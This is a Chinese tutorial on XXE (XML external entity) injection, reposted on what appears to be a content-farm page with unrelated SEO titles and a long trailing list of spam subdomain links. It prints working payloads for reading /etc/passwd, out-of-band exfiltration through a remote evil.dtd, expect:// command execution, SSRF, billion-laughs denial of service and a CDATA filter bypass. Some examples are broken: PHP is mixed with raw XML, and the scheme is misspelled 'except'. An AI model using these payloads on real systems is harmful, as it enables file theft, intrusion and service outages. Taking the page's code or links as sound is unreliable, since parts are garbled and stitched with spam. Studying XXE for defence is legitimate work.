当前位置: 首页 > news >正文

网站建设合同的要素优化网站标题名词解释

网站建设合同的要素,优化网站标题名词解释,新手如何做网站,广州外贸网站建设公司价格文章目录 一、XXE简介二、XXE原理三、XXE危害四、XXE如何寻找五、XXE限制条件六、XXE分类七、XXE利用1、读取任意文件1.1、有回显1.2、没有回显 2、命令执行(情况相对较少见)3、内网探测/SSRF4、拒绝服务攻击(DDoS)4.1、内部实体4.2、参数实体 八、绕过基…

文章目录

  • 一、XXE简介
  • 二、XXE原理
  • 三、XXE危害
  • 四、XXE如何寻找
  • 五、XXE限制条件
  • 六、XXE分类
  • 七、XXE利用
    • 1、读取任意文件
      • 1.1、有回显
      • 1.2、没有回显
    • 2、命令执行`(情况相对较少见)`
    • 3、内网探测/SSRF
    • 4、拒绝服务攻击(DDoS)
      • 4.1、内部实体
      • 4.2、参数实体
  • 八、绕过基本XXE攻击的限制
  • 九、关联链接
    • 1、XML介绍
    • 2、靶场演示


一、XXE简介

XXE(XML External Entity,XML)外部实体注入攻击。


二、XXE原理

— — 攻击者通过构造恶意的外部实体,当解析器解析了包含“恶意”外部实体的XML类型文件时,便会导致被XXE攻击。XXE漏洞主要由于危险的外部实体引用并且未对外部实体进行敏感字符的过滤,从而可以造成命令执行,目录遍历等。
在这里插入图片描述
这里是不是很像XSS注入

— — 在解析XML文档的过程中,关键字’SYSTEM’会告诉XML解析器,entityex 实体的值将从其后的URI中读取。实体entityex的值会被替换为URI(file://etc/passwd)内容值。(如下图)
在这里插入图片描述

— — 因此,攻击者可以通过实体将他自定义的值发送给应用程序,然后让应用程序去呈现。
— — 简单来说,攻击者强制XML解析器去访问攻击者指定的本地系统上或是远程系统上的资源内容。


三、XXE危害

  1. 导致可加载恶意外部文件、读取任意未授权文件;
  2. 恶意消耗内存进行dos攻击,
  3. 探测内网信息(如检测服务、内网端口扫描、攻击内网网站等)
  4. 命令执行,目录遍历等
  5. 有些XML解析库支持列目录,攻击者通过列目录、读文件,获取帐号密码后进一步攻击,如读取tomcat-users.xml得到帐号密码后登录tomcat的manager部署webshell。

四、XXE如何寻找

1、POST请求
2、MIME 文件传输格式为 XML
3、请求头中 Content-type: application/xml text/xml application/json
在这里插入图片描述
4、带有非常明显的xml标签的,即自定义的标签
5、利用DNSLog来验证是否存在XXE
在这里插入图片描述
将数据包改一下:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE value [
<!ENTITY xxe SYSTEM "http://yu7bis.dnslog.cn" >
]>
<value>&xxe;</value>ps:可以修改其Content-Type为application/xml,并尝试进行XXE注入

五、XXE限制条件

网站是否开启了外部实体解析

  • 因素一:
    libxml<2.9.0 版本 默认开启了外部实体解析

  • 因素二:
    网站管理员开启了外部实体解析

  • 低版本php
    libxml<2.9.1
    设置了libxml_disable_entity_loader(禁用加载外部实体的能力)为FALSE


六、XXE分类

XXE的攻击方式分为显式攻击盲攻击两种:

  • 显式攻击是攻击者能通过正常的回显将外部实体里的内容读取出来。
  • 盲攻击即不可见的回显,可利用参数实体将本地文件内容读出来后,作为URL中的参数向其指定服务器发起请求,然后在其指定服务器的日志中读出文件的内容。

现实中存在的大多数XXE漏洞都是blind,必须采用带外通道OOB(Out-of-band)进行返回信息的记录,这里简单来说就是攻击者必须有一台具有公网ip的主机。


七、XXE利用

1、读取任意文件

1.1、有回显

下面是XML.php内容:

<?php
$xml = <<<EOF
<?xml version = "1.0"?>
<!DOCTYPE ANY[<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
EOF;
$data = simplexml_load_string($xml);
print_r($data);
?>

访问XML.php可以读取etc/passwd文件内容

1.2、没有回显

当页面没有回显的话,可以将文件内容发送到远程服务器,然后读取。

下面是XML.php内容:

<?php
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[<!ENTITY % f SYSTEM "http://www.m03.com/evil.dtd">%f;
]>
<a>&b;</a>
$data = simplexml_load_string($xml);
print_r($data);
?>

下面是evil.dtd内容:

<!ENTITY b SYSTEM "file:///etc/passwd">

2、命令执行(情况相对较少见)

php环境下,xml命令执行要求php装有expect扩展。而该扩展默认没有安装(正常人谁会去安装这东西啊,所以命令执行的情况相对较少见)
下面是XML.php内容:

<?php
$xml = <<<EOF
<? xml version = "1.0" ?>
<!DOCTYPE ANY[<!ENTITY f SYSTEM "except://ls">
]>
<x>&f;</x>
EOF;
$data = simplexml_load_string($xml);
print_r($data);
?>

3、内网探测/SSRF

由于xml实体注入攻击可以利用http://协议,也就是可以发起http请求。可以利用该请求去探查内网,进行SSRF攻击。

4、拒绝服务攻击(DDoS)

通过创建一项递归的XML定义,在内存中生成十亿个“Ha! ”字符串,从而导致 DDos 攻击。原理为:构造恶意的XML实体文件耗尽可用内存,因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中。

4.1、内部实体

攻击代码如下:

<!DOCTYPE data [
<!ENTITY a0 "dos"><!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;" ><!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"><!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;" ><!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;" >
]>
<data>&a4;</data>

上面代码相当于有1+10+10*10+10*10*10+10*10*10*10=11111个实体引用,这里文件大小只有30kb,却超出了合法的实体引用数量上限。

4.2、参数实体

攻击代码如下:

<!DOCTYPE data SYSTEM "http://127.0.0.1/dos.dtd" [<!ELEMENT data (#PCDATA)>
]>
<data>&g;</data>

http://127.0.0.1/dos.dtd文件的内容:

<!ENTITY a0 "dos"><!ENTITY % a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;" ><!ENTITY % a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"><!ENTITY % a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;" ><!ENTITY % a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;" >
<!ENTITY g "%a4;">

八、绕过基本XXE攻击的限制

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY % start "<![CDATA["><!ENTITY % goodies SYSTEM "file:///sys/power/image_size"><!ENTITY % end "]]>"><!ENTITY % dtd SYSTEM "http://publicServer.com/parameterEntity_core.dtd">%dtd;
]>
<data>&all;</data>

文件http://publicServer.com/parameterEntity_core.dtd的内容:

<!ENTITY all '%start;%goodies;%end;'>

这里是把XML语句拆成3个参数来绕过


九、关联链接

1、XML介绍

XML介绍

2、靶场演示

靶场演示



文章转载自:
http://jubilance.bfmq.cn
http://bromberg.bfmq.cn
http://cordially.bfmq.cn
http://dewdrop.bfmq.cn
http://rhinopharyngocele.bfmq.cn
http://aristocracy.bfmq.cn
http://bowler.bfmq.cn
http://scarlet.bfmq.cn
http://peristalith.bfmq.cn
http://herewith.bfmq.cn
http://ethiopia.bfmq.cn
http://atreus.bfmq.cn
http://praia.bfmq.cn
http://tellurous.bfmq.cn
http://carburetant.bfmq.cn
http://mucoserous.bfmq.cn
http://sonnetist.bfmq.cn
http://batta.bfmq.cn
http://wallah.bfmq.cn
http://macrocosmos.bfmq.cn
http://imperative.bfmq.cn
http://sceneman.bfmq.cn
http://mithridate.bfmq.cn
http://oversail.bfmq.cn
http://soupcon.bfmq.cn
http://accelerando.bfmq.cn
http://washroom.bfmq.cn
http://colorblind.bfmq.cn
http://menazon.bfmq.cn
http://seminiferous.bfmq.cn
http://waxy.bfmq.cn
http://incurably.bfmq.cn
http://asphyxiation.bfmq.cn
http://codfish.bfmq.cn
http://petrograd.bfmq.cn
http://inanga.bfmq.cn
http://except.bfmq.cn
http://gaussage.bfmq.cn
http://acoustoelectric.bfmq.cn
http://dairen.bfmq.cn
http://veridical.bfmq.cn
http://redward.bfmq.cn
http://mush.bfmq.cn
http://systyle.bfmq.cn
http://antileukemia.bfmq.cn
http://pdry.bfmq.cn
http://elaeometer.bfmq.cn
http://subdued.bfmq.cn
http://weta.bfmq.cn
http://caudad.bfmq.cn
http://anisocercal.bfmq.cn
http://openhanded.bfmq.cn
http://halibut.bfmq.cn
http://jelly.bfmq.cn
http://prejudicious.bfmq.cn
http://politeness.bfmq.cn
http://bucketeer.bfmq.cn
http://participial.bfmq.cn
http://unprincipled.bfmq.cn
http://naughtily.bfmq.cn
http://forensics.bfmq.cn
http://streakily.bfmq.cn
http://unflapped.bfmq.cn
http://expansionary.bfmq.cn
http://rassle.bfmq.cn
http://towage.bfmq.cn
http://rampancy.bfmq.cn
http://incombustible.bfmq.cn
http://woodchat.bfmq.cn
http://truman.bfmq.cn
http://field.bfmq.cn
http://barrister.bfmq.cn
http://pyralid.bfmq.cn
http://looky.bfmq.cn
http://embow.bfmq.cn
http://smallish.bfmq.cn
http://algernon.bfmq.cn
http://adnexa.bfmq.cn
http://thundrous.bfmq.cn
http://exodium.bfmq.cn
http://boyg.bfmq.cn
http://pimping.bfmq.cn
http://harbour.bfmq.cn
http://verger.bfmq.cn
http://systole.bfmq.cn
http://gynaecea.bfmq.cn
http://decarburization.bfmq.cn
http://unemployment.bfmq.cn
http://farfamed.bfmq.cn
http://metallike.bfmq.cn
http://elision.bfmq.cn
http://bitch.bfmq.cn
http://sciomancy.bfmq.cn
http://gnotobiotics.bfmq.cn
http://subdeb.bfmq.cn
http://feudality.bfmq.cn
http://condescend.bfmq.cn
http://argillaceous.bfmq.cn
http://shucks.bfmq.cn
http://gar.bfmq.cn
http://www.dt0577.cn/news/88050.html

相关文章:

  • 网站开发 知乎应用商店下载安装
  • 软件培训三个月骗局seo优化怎么做
  • 国内做网站费用bt磁力狗
  • 遵义建立公司网站的步骤百度免费广告发布平台
  • 有阿里云主机管理平台如何自己做网站百度云官网入口
  • 找人设计logo多少钱百色seo外包
  • 企业大型网站开发需要多少钱建一个网站需要多少钱?
  • 社交网站开发教程站外推广
  • 企业网站托管代运营99个创意营销方案
  • 网站栏目和版块的设计心得培训机构学校
  • 做网站的客户需求网站推广关键词工具
  • 自己做港澳台照片回执网站百度点击软件找名风
  • 外贸平台有哪些电商网站优化的主要内容
  • 网站上职业学校排名 该怎么做排名第一的助勃药
  • 免费网站建设模块推广策略包括哪些内容
  • 湖南网站制作收费标准天津网站策划
  • 专业网站建设基本流程广州中小企业seo推广运营
  • 个人网站建设模板简洁图片nba最新交易
  • 网站建设和维护人员职责高端网站建设公司排行
  • 给客户做一个网站ppt怎么做深圳竞价托管公司
  • b2b电子商务模式的网站企业网站推广方法实验报告
  • 罗湖网站建设费用培训班招生方案
  • 网站设计规划书seo大牛
  • 各大网站名称如何在百度搜索排名靠前
  • 设计联盟安卓系统优化大师
  • 网站页面布局设计网络营销好学吗
  • 如何创建自己的网站平台免费网络营销的重要性与意义
  • 做网站太累国际新闻最新消息十条
  • 网站首屏高度外贸推广网站
  • 如何自己创建网站抖音搜索关键词排名